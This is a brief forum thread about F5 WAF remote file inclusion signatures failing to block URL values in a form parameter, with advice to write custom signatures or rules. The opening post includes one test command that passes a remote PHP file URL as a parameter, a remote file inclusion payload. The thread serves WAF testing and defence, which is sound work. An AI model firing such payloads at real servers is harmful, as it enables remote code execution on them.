Forum Discussion

Nikoolayy1's avatar
Nikoolayy1
Icon for MVP rankMVP
Jul 21, 2023

F5 ASM/AWAF Remote File Inclusion signatures do not block http:// or https:// in the form parameter

Hello,   I tested some pentesting attacks like "curl https://x.x.x.x/?niki=http://1.1.1.1/file.php -kv" and the RFI/RFE attack does not get blocked even with RFI signatures beeing enabled as ment...
security
  • Nikoolayy1's avatar
    Nikoolayy1
    Jul 27, 2023

    I tested this on other vendors and it is the same as the info I got is that there are no default signatures for this RFI attack as it will cause many issues an false positives, so you need to make a custom signature/irule to block this for the specific vunrable parameter.

     

    Outside of that for XC Distributed Cloud the Service policy rules seem the way to go for configuring something like signatures:

     

     

Nikoolayy1's avatar
Nikoolayy1
Icon for MVP rankMVP
Jul 27, 2023

I tested this on other vendors and it is the same as the info I got is that there are no default signatures for this RFI attack as it will cause many issues an false positives, so you need to make a custom signature/irule to block this for the specific vunrable parameter.

 

Outside of that for XC Distributed Cloud the Service policy rules seem the way to go for configuring something like signatures: